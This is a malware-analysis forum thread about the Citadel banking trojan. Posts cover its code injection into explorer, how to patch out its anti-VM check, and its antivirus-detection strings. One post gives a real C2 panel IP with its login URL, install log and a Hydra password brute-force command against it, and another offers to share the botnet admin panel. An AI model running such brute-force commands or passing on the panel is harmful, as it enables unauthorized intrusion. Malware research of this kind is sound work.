Probably it activity restricted by sandbox. Why you want to run malware in VM + Sandboxie?Cassiel wrote:@ EP_X0FF
I have run the sample in my VM and I noticed some strange things. If I run it outside BSA it will set the autorun part, if I run it inside BSA it won't.
There are the "usual" registry changes but there is nothing being added to the run key. It is like it puts itself to sleep and then can no longer continue.
Citadel (Zeus clone)
- EP_X0FF
- Global Moderator
- Posts: 4775
- Joined: Sun Mar 07, 2010 5:35 am
- Location: Russian Federation
- Contact:
Re: Citadel (Zeus clone)
Ring0 - the source of inspiration
- Buster_BSA
- Posts: 390
- Joined: Mon Mar 22, 2010 6:42 am
Re: Citadel (Zeus clone)
Probably the malware is injecting code to a system process and then setting autorun part from there. As Sandboxie does not allow injection to processes running outside the sandbox, the process will fail so autorun too.Cassiel wrote:@ EP_X0FF
I have run the sample in my VM and I noticed some strange things. If I run it outside BSA it will set the autorun part, if I run it inside BSA it won't.
There are the "usual" registry changes but there is nothing being added to the run key. It is like it puts itself to sleep and then can no longer continue.
Last edited by Buster_BSA on Fri Jan 04, 2013 2:33 pm, edited 1 time in total.
Re: Citadel (Zeus clone)
@ EP_X0FF
Well my idea was to use a VM with BSA in order to have a snapshot if things went wrong.
I tried cuckoo also however I like the reporting from BSA a lot more then cuckoo.
@ Buster_BSA
You are most likely right, I am going to check this with procmon in order to see how the registry keyis being set.
EDIT:
You are right, it is injecting into explorer and after that it is creating the autorun key.
Well my idea was to use a VM with BSA in order to have a snapshot if things went wrong.
I tried cuckoo also however I like the reporting from BSA a lot more then cuckoo.
@ Buster_BSA
You are most likely right, I am going to check this with procmon in order to see how the registry keyis being set.
EDIT:
You are right, it is injecting into explorer and after that it is creating the autorun key.
- Buster_BSA
- Posts: 390
- Joined: Mon Mar 22, 2010 6:42 am
Re: Citadel (Zeus clone)
I would like such injections were being sucessfully done so BSA analysis can be more complete, but the thing depends on Sandboxie´s restrictions. I am going to talk with Ronen about this and I will ask him if there is any workaround to solve the issue.Cassiel wrote:You are right, it is injecting into explorer and after that it is creating the autorun key.
Re: Citadel (Zeus clone)
Citadel 1.3.5.1 Rain Edition sample. It have some anti-VM and anti-AVS functions, couldn't run it under Comodo and didn't try manually, maybe someone will do.
You do not have the required permissions to view the files attached to this post.
- EP_X0FF
- Global Moderator
- Posts: 4775
- Joined: Sun Mar 07, 2010 5:35 am
- Location: Russian Federation
- Contact:
Re: Citadel (Zeus clone)
Not found. Except lame trick with GetKeyboardLayoutList (patch two bytes @00418FC6 with nops) and another lame trick withexitthematrix wrote:Citadel 1.3.5.1 Rain Edition sample. It have some anti-VM
Code: Select all
ROOT\SECURITYCENTERROOT\SECURITYCENTER2 SELECT * FROM%sWQL
Antivirus Product company Name display Name version Number Unknown Company:%s
Product:%s
Version:%s
Firewall Product
Software\Microsoft\Windows\CurrentVersion\Uninstall
Publisher Display Name Display Version%u:%s|%s|%s
Code: Select all
SafenSoft SysWatch McAfee McAfee Security Center McAfee SecurityCenter Symantec Client Symantec Protection Symantec Shared Symantec Security Norton Protection Kaspersky Security Kaspersky Anti-Virus avast! Antivirus AntiVir Desktop AVG Monitor AVG Service AVG Security ESET Security ESET Antivirus Microsoft Inspection Microsoft Malware Microsoft Security
Patched Zeus result (full disclosure).
http://camas.comodo.com/cgi-bin/submit? ... f9856e4263
No matter how it named - zeus, ice-ix, citadel it all the same slavik shit.
Ring0 - the source of inspiration
Re: Citadel (Zeus clone)
Thank you very much for the tips and help 

- Xylitol
- Global Moderator
- Posts: 1652
- Joined: Sat Apr 10, 2010 5:54 pm
- Location: Seireitei, Soul Society
- Contact:
Re: Citadel (Zeus clone)
Code: Select all
• dns: 1 ›› ip: 62.109.1.7 - adresse: CITAB-TEST.TK
http://62.109.1.7/net/panel.php?m=login
Code: Select all
http://62.109.1.7/net/install/
• [0] - Connecting to MySQL as 'citab-test'.
• [0] - Selecting DB 'citab-test'.
• [0] - Updating table 'botnet_list'.
• [0] - Creating table 'botnet_reports'.
• [0] - Updating table 'botnet_reports_130119'.
• [0] - Filling table 'ipv4toc'.
• [0] - Creating table 'ipv4toc'.
• [3] - Updating table 'cp_users'.
• [3] - Updating table 'botnet_scripts'.
• [3] - Updating table 'botnet_scripts_stat'.
• [3] - Updating table 'botnet_software_stat'.
• [3] - Updating table 'exe_updates'.
• [3] - Updating table 'exe_updates_crypter'.
• [3] - Updating table 'accparse_rules'.
• [3] - Updating table 'accparse_accounts'.
• [3] - Updating table 'vnc_bot_connections'.
• [3] - Updating table 'jabber_messages'.
• [3] - Updating table 'botnet_screenshots'.
• [3] - Updating table 'botnet_rep_favorites'.
• [3] - Updating table 'botnet_activity'.
• [3] - Updating table 'botnet_webinjects_group'.
• [3] - Updating table 'botnet_webinjects_group_perms'.
• [3] - Updating table 'botnet_webinjects'.
• [3] - Updating table 'botnet_webinjects_bundle'.
• [3] - Updating table 'botnet_webinjects_bundle_execlim'.
• [3] - Updating table 'botnet_webinjects_bundle_members'.
• [3] - Updating table 'botnet_webinjects_history'.
• [3] - Creating folder '_logos'.
• [3] - Writing config file
• [3] - Searching for the god particle...
• [3] - Creating folder 'system/data'.
• [3] - Creating folder 'public'.
• [3] - Creating folder 'files'.
• [3] - Creating folder 'files/webinjects'.
-- Update complete! --
EP_X0FF wrote:No matter how it named - zeus, ice-ix, citadel it all the same slavik shit.
Code: Select all
-l admin -P pwd.lst -s 80 -w 64 -f -V 62.109.1.7 http-post-form "/net/panel.php?m=login:user=admin&pass=^PASS^:Bad user name or password."
Re: Citadel (Zeus clone)
If someone needs the PHP Admin Panel of this slavik mod shit let me know I can upload it.
Re: Citadel (Zeus clone)
Seems like Citadel is the new favorite toy of some criminal gangs targeting government organizations:
McAfee Blog: http://blogs.mcafee.com/mcafee-labs/lab ... del-trojan
HitmanPro Blog: https://hitmanpro.wordpress.com/2013/02 ... onnection/
McAfee Blog: http://blogs.mcafee.com/mcafee-labs/lab ... del-trojan
HitmanPro Blog: https://hitmanpro.wordpress.com/2013/02 ... onnection/
Malware Reversing
http://www.malware-reversing.com
http://www.malware-reversing.com